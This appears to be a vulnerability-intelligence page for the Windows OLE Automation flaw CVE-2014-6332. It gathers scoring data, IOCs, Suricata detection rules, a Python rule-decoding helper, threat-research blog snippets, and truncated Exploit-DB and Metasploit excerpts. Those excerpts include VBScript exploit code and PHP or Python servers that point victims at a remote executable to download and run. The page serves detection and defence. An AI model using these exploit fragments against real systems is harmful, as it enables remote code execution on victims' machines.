CVE-2014-6332
Published: 2014-11-11
Priority: P1 97 high; CVSS 3.1: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT, Ransomware
CISA Known Exploited Vulnerability, remediation due 2022-04-15
Exploited in the wild
EPSS: 95.00% (99.9th percentile)
OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka "Windows OLE Automation Array Remote Code Execution Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
Detection & IOCs (extracted from sources)
bytes: 0xDEADBEEF41414141
- The CVE-2014-6332 SWF exploit shellcode bypasses EMET EAF by calling NtSetContextThread to override debug registers, eliminating EMET's EAF feature. Detect NtSetContextThread calls that modify debug registers from within browser/Flash processes.
- The exploit shellcode checks for the presence of EMET.dll in the process before choosing its WinExec invocation path. Monitor for EMET.dll presence checks from shellcode-like memory regions.
- The exploit drops a payload PE disguised as a JPEG ('shadow.jpg') marked with magic bytes 0xDEADBEEF41414141. Scan files with .jpg extension for this magic value as a detection signal.
- The exploit writes a payload to '%TEMP%\windump.exe' and executes it via WinExec. Alert on windump.exe creation in the user's Temp directory from browser or Office processes.
- The ROP chain is triggered by overriding a Sound object's vtable and calling toString. Detect vtable overwrites on Sound objects in Flash processes as an exploitation indicator.
- Pirpi malware uses HTTP GET requests with encrypted data in the Cookie header for C2 communication. Detect anomalous Cookie header content in GET requests to unknown domains from endpoints.
- The Lotus Blossom exploit payload is loaded via rundll32 with export 'Setting' from mm.dll in %LOCALAPPDATA%. Alert on rundll32 executing DLLs from AppData with the 'Setting' export argument.
- The exploit shellcode uses a ror-7 hash algorithm on kernel32.dll function names to resolve APIs; the constant 0xC917432 identifies LoadLibraryA. Use this constant in memory scanning or shellcode emulation rules.
- Pirpi checks for a configuration file at %APPDATA%\vcl.tmp or %TEMP%\vcl.tmp. Alert on creation or access of vcl.tmp in these locations as a Pirpi infection indicator.
- The Pirpi payload (IePorxyv.dll) uses a configuration file (vcl.tmp) for C2 domains if present; otherwise it falls back to hardcoded C2 domains encoded inside the binary. Detection based solely on network IOCs may miss cases where vcl.tmp overrides hardcoded values.
- The CVE-2014-6332 SWF exploit's EMET bypass is incomplete: it would still be caught by EMET's stack pivot check on VirtualAlloc, meaning EMET 4.1 with stack pivot protection enabled would block this specific sample.
- The Lotus Blossom attack used a slightly modified version of the publicly available CVE-2014-6332 PoC VBScript; detections based on the exact PoC may miss actor-modified variants that remove comments and add payload extraction logic.
CVSS provenance
- NVD v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
- NVD v2.0: 9.3 CRITICAL (AV:N/AC:M/Au:N/C:C/I:C/A:C)
- VulnCheck: 8.8 HIGH
- CISA: 8.8 HIGH
GHSA: GHSA-w64p-pvrc-c5w3: OleAut32 (unreviewed, 2022-05-14; CVE-2014-6332, HIGH, CWE-119)
Description: same text as the NVD description above.
VulnCheck: Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability (2014, CVSS 8.8, HIGH, CWE-119)
OleAut32.dll in OLE in Microsoft Windows allows remote attackers to remotely execute code via a crafted web site.
Affected: Microsoft Windows
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rig-exploit-kit-diving-deeper-into-the-infrastructure/; https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf; https://www.stormshield.com/news/when-elf-billgates-met-windows/; https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/; https://comm
CISA: Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability (2022-03-25, CVSS 8.8, HIGH, CWE-119)
Vulnerability: Microsoft Windows Object Linking & Embedding (OLE) Automation Array Remote Code Execution Vulnerability
Affected: Microsoft Windows
OleAut32.dll in OLE in Microsoft Windows allows remote attackers to remotely execute code via a crafted web site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-6332
Remediation Due Date: 2022-04-15
Suricata: ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2 (2016-09-01, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M2"; flow:established,to_client; http.server; content:"HFS|20|"; file.data; content:"|6f 62 6a 57 73 68 2e 72 75 6e 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 70 75 74 74 79 2e 65 78 65 22|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023146; rev:5; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_07;)
Suricata: ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1 (2016-09-01, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 Sep 01 2016 (HFS Actor) M1"; flow:established,to_client; file.data; content:"|26 63 68 72 77 28 32 31 37 36 29 26 63 68 72 77 28 30 31 29 26|"; nocase; content:"|26 63 68 72 77 28 33 32 37 36 37 29|"; nocase; content:"|73 65 74 6e 6f 74 73 61 66 65 6d 6f 64 65 28 29|"; nocase; content:"|72 75 6e 73 68 65 6c 6c 63 6f 64 65 28 29|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023145; rev:3; metadata:affected_product Internet_Explorer, attack_target Client_Endpoint, created_at 2016_09_01, cve CVE_2014_6332, deployment Perimeter, malware_family IEiExploit, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, upd
Suricata: ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2 (2016-05-06, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Construct M2"; flow:established,to_client; file.data; content:"redim"; nocase; fast_pattern; content:"Preserve"; nocase; content:"VBScript"; nocase; content:"chrw"; content:"32767"; distance:0; content:"chrw"; content:"2176"; distance:0; classtype:attempted-admin; sid:2022797; rev:4; metadata:created_at 2016_05_06, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_i
Suricata: ET EXPLOIT Possible CVE-2014-6332 DECS2 (2015-02-18, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2014-6332 DECS2"; flow:established,to_client; file.data; content:"102,117,110,99,116,105,111,110,32,114,117,110,109,117,109,97,97"; classtype:trojan-activity; sid:2020460; rev:5; metadata:created_at 2015_02_18, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_14;)
Suricata: ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve (2014-12-03, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible Internet Explorer VBscript CVE-2014-6332 multiple redim preserve"; flow:established,to_client; http.content_type; content:!"text/xml"; content:!"application/xml"; file.data; content:"preserve"; nocase; content:"redim|20|"; nocase; fast_pattern; pcre:"/^\s*?Preserve\s*?(?P[a-z]\w{0,254}+)\s*?\x28\s*?[^\x29]+?\x29.*?redim\s*?Preserve\s*?(?P=var1)/Rsi"; reference:cve,2014-6332; classtype:attempted-user; sid:2019842; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2014_12_03, cve CVE_2014_6332, deployment Perimeter, confidence Medium, signature_seve
Suricata: ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name (2014-11-18, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible Internet Explorer VBscript failure to handle error case information disclosure CVE-2014-6332 Common Function Name"; flow:established,to_client; file.data; content:"function"; pcre:"/^(?:\x25(?:25)*?20|\s)*?runmumaa\W/Rs"; content:"runmumaa"; fast_pattern; reference:cve,2014-6332; classtype:attempted-user; sid:2019733; rev:7; metadata:created_at 2014_11_18, cve CVE_2014_6332, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1082, m
Suricata: ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332 (2014-11-15, CVSS 8.8, HIGH)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Possible Internet Explorer VBscript failure to handle error case information disclosure obfuscated CVE-2014-6332"; flow:established,to_client; file.data; content:"vbscript"; nocase; content:"Xor"; nocase; pcre:"/^\W/R"; content:"Execute"; nocase; content:"&chr"; nocase; content:"UBound"; fast_pattern; nocase; content:"Cint"; nocase; pcre:"/^\W/R"; content:"Split"; nocase; pcre:"/^\W/R"; content:"Mid"; pcre:"/^\W/R"; content:"Len"; pcre:"/^\W/R"; reference:cve,2014-6332; classtype:attempted-user; sid:2019715; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, a
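As an added example (not from this page and not part of the Emerging Threats rule set), the following Python decodes the `content:` options of the Suricata signatures above, so a defender can read what sid 2023146 and sid 2020460 actually match on, and evaluates them against a constructed sample response. It interprets only content, nocase and negation; sticky buffers (http.server, file.data, http.content_type), pcre, distance and flow are ignored by assumption, which makes it a rule-reading aid rather than a Suricata re-implementation.

```python
"""Decode and evaluate the content: options of Suricata signatures.

Added example; only content/nocase/negation are interpreted. Sticky buffers,
pcre, distance/within and flow are deliberately ignored (an assumption), so a
match here means "all the rule's byte patterns occur somewhere in the data".
"""
import re

# Rule text copied from the page, with the metadata: option dropped for brevity.
RULE_HFS_M2 = (
    'alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2014-6332 '
    'Sep 01 2016 (HFS Actor) M2"; flow:established,to_client; http.server; '
    'content:"HFS|20|"; file.data; content:"|6f 62 6a 57 73 68 2e 72 75 6e 20 22 '
    '43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 70 75 74 74 79 2e 65 78 65 '
    '22|"; nocase; reference:cve,2014-6332; classtype:trojan-activity; sid:2023146; rev:5;)'
)
RULE_DECS2 = (
    'alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible '
    'CVE-2014-6332 DECS2"; flow:established,to_client; file.data; '
    'content:"102,117,110,99,116,105,111,110,32,114,117,110,109,117,109,97,97"; '
    'classtype:trojan-activity; sid:2020460; rev:5;)'
)
# Option fragment of sid 2019842, which carries negated contents on the content type.
RULE_REDIM_PRESERVE = (
    'http.content_type; content:!"text/xml"; content:!"application/xml"; '
    'file.data; content:"preserve"; nocase; content:"redim|20|"; nocase; fast_pattern;'
)

# One content option: optional '!', the quoted pattern, then any directly
# following nocase/fast_pattern modifiers.
_CONTENT_RE = re.compile(
    r'content:(?P<neg>!?)"(?P<pat>(?:[^"\\]|\\.)*)"\s*;'
    r'(?P<mods>(?:\s*(?:nocase|fast_pattern)\s*;)*)'
)
# One token of a content string: |hex bytes|, a backslash escape, or literal text.
_TOKEN_RE = re.compile(r'\|([0-9A-Fa-f\s]*)\||\\(.)|([^|\\]+)')


def decode_content(pattern: str) -> bytes:
    """Convert a Suricata content string to the raw bytes it matches.

    Text between pipes is hex ("|6f 62 6a|" -> b"obj"); the rest is literal,
    with Suricata's backslash escapes (\\" \\; \\: \\| \\\\) unescaped.
    """
    out = bytearray()
    pos = 0
    for m in _TOKEN_RE.finditer(pattern):
        if m.start() != pos:
            break  # an unbalanced '|' leaves a gap no token can cover
        pos = m.end()
        hexpart, esc, lit = m.groups()
        if hexpart is not None:
            out += bytes.fromhex(hexpart.replace(" ", ""))
        else:
            out += (esc if esc is not None else lit).encode("latin-1")
    if pos != len(pattern):
        raise ValueError("unbalanced '|' in content pattern: %r" % pattern)
    return bytes(out)


def extract_contents(rule: str):
    """Return [(needle_bytes, negated, nocase), ...] in rule order."""
    return [
        (decode_content(m.group("pat")), m.group("neg") == "!", "nocase" in m.group("mods"))
        for m in _CONTENT_RE.finditer(rule)
    ]


def rule_matches(rule: str, data: bytes) -> bool:
    """True if every non-negated content occurs in data and no negated one does."""
    for needle, negated, nocase in extract_contents(rule):
        hay, nee = (data.lower(), needle.lower()) if nocase else (data, needle)
        if (nee in hay) == negated:
            return False
    return True


def decimal_charcodes_to_text(csv: str) -> str:
    """Decode the comma-separated char-code form that sid 2020460 matches on."""
    return "".join(chr(int(code)) for code in csv.split(","))


# Constructed samples carrying only the strings the rules look for.
SAMPLE_HFS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: HFS 2.3\r\nContent-Type: text/html\r\n\r\n"
    b'<script language="vbscript">objWsh.run "C:\\Windows\\Temp\\putty.exe"</script>'
)
SAMPLE_XML_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n<feed>ReDim Preserve arr(1)</feed>"
)

if __name__ == "__main__":
    for needle, neg, nocase in extract_contents(RULE_HFS_M2):
        print(("NOT " if neg else "") + repr(needle), "(nocase)" if nocase else "")
    print("sid 2023146 fires on sample:", rule_matches(RULE_HFS_M2, SAMPLE_HFS_RESPONSE))
    decs2 = extract_contents(RULE_DECS2)[0][0].decode()
    print("sid 2020460 content decodes to:", decimal_charcodes_to_text(decs2))
    print("sid 2019842 on text/xml body:", rule_matches(RULE_REDIM_PRESERVE, SAMPLE_XML_RESPONSE))
```

The negated contents of sid 2019842 are why an XML document that happens to contain `ReDim Preserve` does not fire: the rule requires the content type to be something other than XML before the VBScript constructs count.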
Exploit-DB: The World Browser 3.0 Final - Remote Code Execution (2015-10-22, CVE-2014-6332)
---
#!/usr/bin/php
Exploit-DB: HTML Compiler - Remote Code Execution (2015-10-20, CVE-2014-6332)
---
#!/usr/bin/php
New Project -> Choose here your site index file
# 4 . browse loader.html
# 5 . Enjoy !
##########################################################
# loader.html source code :
#
# poc
##########################################################
# proof : http://ehsann.info/proof/HTML_Compiler_Remote_Code_Execute.png
##########################################################
$port=80; # Listen port ( if using from Skype or another program that using from 80 port change this )
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your Malicious file
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($socket, 0,$port);
socket_listen($socket);
print "http://ipaddress:$port / htt
Exploit-DB: Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064) (2015-08-17, CVE-2014-6332)
---
#!/usr/bin/php
poc'."\n\n";
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
Exploit-DB: Internet Download Manager - OLE Automation Array Remote Code Execution (2015-07-21, CVE-2014-6332)
---
#!/usr/bin/php
Run Site Grabber
# 4 . Enter any word "Start page/address"
# 5 . Click Addvance
# 6 . check "Enter Login and password manually at the following web page"
# 7 . Enter your exploit link http://ipaddress:80/
# 8 . Next --> Next --> Next --> Next
# 9 . Your Link Download/Execute on your target
# 10 . Finished ;)
#
#
#Demo : http://youtu.be/fAUAX7UjXLg
$port=80; # Port Address
$link="http://10.211.55.3/putty.exe"; # Your exe link
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
$msg =
"\x3c\x68\x74\x6d\x6
Exploit-DB: Havij - OLE Automation Array Remote Code Execution (2015-06-27, CVE-2014-6332)
---
#!/usr/bin/php
Exploit-DB: Acunetix 9.5 - OLE Automation Array Remote Code Execution (2015-03-27, CVE-2014-6332)
---
#!/usr/bin/python
import BaseHTTPServer, sys, socket
##
# Acunetix OLE Automation Array Remote Code Execution
#
# Author: Naser Farhadi
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
#
# Date: 27 Mar 2015 # Version: acunetix.exe
#
# Video: https://vid.me/SRCb
##
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(req):
        req.send_response(200)
        if req.path == "/acunetix.exe":
            req.send_header('Content-type', 'application/exe')
            req.end_headers()
            exe = open("acunetix.exe", 'rb')
            req.wfile.write(exe.read())
            exe.close()
        else:
            req.send_header('Content-type', 'text/html')
            req.end_headers()
            req.wfile.write("""Please scan me!
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Ap
Exploit-DB: Microsoft Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064) (2014-11-20, CVE-2014-6332)
---
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
| Rework: GradiusX ([email protected] ) & b33f (@FuzzySec) |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
| Usage: http://www.fuzzysecurity.com/exploits/21.html |
|--------------------------------------------------------------------------|
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D 人无千日好,花无百日红 (no one stays fortunate a thousand days, no flower stays red a hundred days)
|-----------------------------------------------------------
Exploit-DB: Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit) (2014-11-13, CVSS 8.8, HIGH, CVE-2014-6332)
Microsoft Internet Explorer "Windows OLE Automation Array Remote Code Execution",
      'Description' => %q{
        This module exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
        Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'IBM', # Discovery
          'yuange ', # PoC
          'Rik van Duijn ', # Metasploit
          'Wesley Neelen ' # Metasploit
        ],
      'References' =>
        [
          [ 'CVE', '2014-6332' ]
        ],
      'Payload' =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "none"
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => "November 12 2014",
      'DefaultTarget' => 0))
  end

  def on_request_uri(cli, request)
    payl = cmd_psh
Exploit-DB: Microsoft Internet Explorer 11 - OLE Automation Array Remote Code Execution (1) (2014-11-13, CVE-2014-6332)
---
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chr
Metasploit: MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution (CVSS 8.8, HIGH, CVE-2014-6332)
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 through version 11 on Windows 95 up to Windows 10, and there is no patch for Windows XP. However, this exploit only targets Windows XP and Windows 7 boxes because of the PowerShell limitation: Windows XP supports VBS by default, so VBS is used as the attack vector there, while on newer Windows systems the exploit tries PowerShell instead.
Sentinelone: Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years (2022-06-09)
## Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
- Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
- Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
- Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
- Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).
## Overview
SentinelLABS has uncovered a cluster of activity beginning a
Unit42: Web-Based Threats: First Half 2019 (2019-11-01)
## Web-Based Threats: First Half 2019
Authors: Fang Liu, Tao Yan, Jin Chen, Rongbo Shao, Zhanglin He, Bo Qu
Published: November 1, 2019
Tags: Malware, Trend Reports, Vulnerabilities, ELink, Exploit Kits, Malicious Domains, Malicious URL, Phishing
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
We observed a significant decrease in the activity of the Fallout exploit kit in the first quarter of 2019 while at the same time observing an increase in activity of the Kaixin exploit kit in the second quarter. Kaixin is primarily observed hosted in China and with the increased popularit
Trendmicro: ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell (2019-09-09)
Cyber Threats
# ‘Purple Fox’ Malware Can Rootkit and Abuse PowerShell
This new iteration of Purple Fox that we came across, delivered by Rig, has a few new tricks up its sleeve. It retains its rootkit component by abusing publicly available code. It also abuses PowerShell, making it capable of fileless infection.
By: Johnlery Triunfante, Earle Maui Earnshaw, Michael Jhon Ofiaza
Sep 09, 2019
Exploit kits may no longer be as prolific as they were back when their activities were detected in the millions, but their recurring activities in the first half of 2019 indicate that they won’t be going away any time soon. The Rig exploit kit, for instance, is known for delivering various payloads — such as downloader trojans, ransomware, cryptocurrency-mining malware,
Unit42: Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing (2019-05-30, CVSS 8.8, HIGH, CVE-2018-8174)
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Authors: Bo Qu, Tao Yan, Rongbo Shao, Zhanglin He
Published: May 30, 2019
Tags: Malware, Trend Reports, Vulnerabilities, Azorult, CVE-2018-8174, ELink
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, phishing scams.
The key findings in this quarter’s report in summary are:
1. Q4 saw an increase in malicious URLs, ending a trend of decreasing malicious URLs that began in Q1 and continued through Q3.
2. For the first time in our tracking, the United States is not the number one
Unit42: Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip (2018-12-27, CVSS 9.8, CRITICAL, CVE-2015-5119)
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Authors: Bo Qu, Tao Yan, Rongbo Shao, Zhanglin He, Xingyu Jin
Published: December 27, 2018
Tags: Malware, Trend Reports, Vulnerabilities, CVE-2015-5119, ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which help us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
# URLs
Based on our analysis of dat
Trendmicro
New CVE-2018-8373 Exploit Spotted
blogs_trendmicro·2018-09-25·CVSS 8.8
CVE-2018-8373 [HIGH] New CVE-2018-8373 Exploit Spotted
Exploits y vulnerabilidades
## New CVE-2018-8373 Exploit Spotted
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability.
By: Elliot Cao Sep 25, 2018 Read time: ( words)
Save to Folio
On September 18, 2018, more than a month after we published a blog revealing the details of a use-after-free (UAF) vulnerability CVE-2018-8373 that affects the VBScript engine in newer Windows versions, we spotted another exploit that uses the same vulnerability. It's important to note that this exploit doesn't work on systems with updated Internet Explorer versions.
Instead of modifying the CONTEXT structure of N
Unit42
Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
blogs_unit42·2018-09-05·CVSS 7.5
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Threat Research Center
Trend Reports
Vulnerabilities
## Web-based Threats-2018 Q2: U.S. Remains #1 in Malicious Web Addresses, China Falls from #2 to #7
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: September 5, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2018-8174
ELink
Executive Summary
In Q2, the United States was number one for hosting malicious domains and exploit kits.
Unit 42 regularly analyzes statistical data from our Email Link Analysis (ELINK) to understand the patterns and trends in current web threats. This blog outlines our analysis for April – June (Q2) 2018 and follows up our previous blog analyzing web-based threats for January – March (Q1) 2018 that can be found here. We also provide detailed analysis of attacks against CVE-2018-8174 (a vulnerability we discuss below) using the Double Kill exploit.
What we found this quarter was that vulnerabilities under attack remained consistent, including very old vulnerabilities. One new vulnerability used in zero-day attacks did rocket to near the top of the list.
The United States remained the num
Securelist
Delving deep into VBScript
blogs_securelist·2018-07-03·CVSS 8.8
CVE-2018-8174 [HIGH] Delving deep into VBScript
Authors
Boris Larin
## Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.
But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of th
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
[CRITICAL] The Old and New: Current Trends in Web-based Threats
Summary
In this blog, Unit 42 is sharing analysis and statistics from our Email Link Analysis (ELINK) from the first quarter of 2018 and highlighting interesting findings of current web threats. We will first describe statistical information about CVEs, malicious URLs and Exploit Kits (EKs), then discuss the current life cycle of these web-based threats, and wrap up with two case studies about evolving EKs and a cryptocurrency miner.
Statistics analysis
CVEs
In the first quarter of 2018, we found 1583 malicious URLs across 496 different domains. Attackers used at least 8 old and public vulnerabilities as shown in Figure 1. The Top 3 CVEs used are
1. CVE-2014-6332: exploited by 774 malicious URLs
2. CVE-2016-0189: exploited by 219 malicious URLs
3. CVE-2015-5122: exploited by 85 malici
Unit42
The Old and New: Current Trends in Web-based Threats
blogs_unit42·2018-06-20·CVSS 9.3
CVE-2014-6332 [CRITICAL] The Old and New: Current Trends in Web-based Threats
Threat Research Center
Trend Reports
Vulnerabilities
## The Old and New: Current Trends in Web-based Threats
Tao Yan
Bo Qu
Zhanglin He
Rongbo Shao
Published: June 20, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2014-6332
CVE-2016-0189
EK
Exploit kit
KaiXin
Rig
Sundown
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Zscaler
Terror Exploit Kit via Malvertising campaign | Zscaler Blog
blogs_zscaler·2017-10-24
Terror Exploit Kit via Malvertising campaign | Zscaler Blog
Securelist
IT threat evolution Q1 2017. Statistics
blogs_securelist·2017-05-22
IT threat evolution Q1 2017. Statistics
Table of Contents
- Q1 figures
- Mobile threats
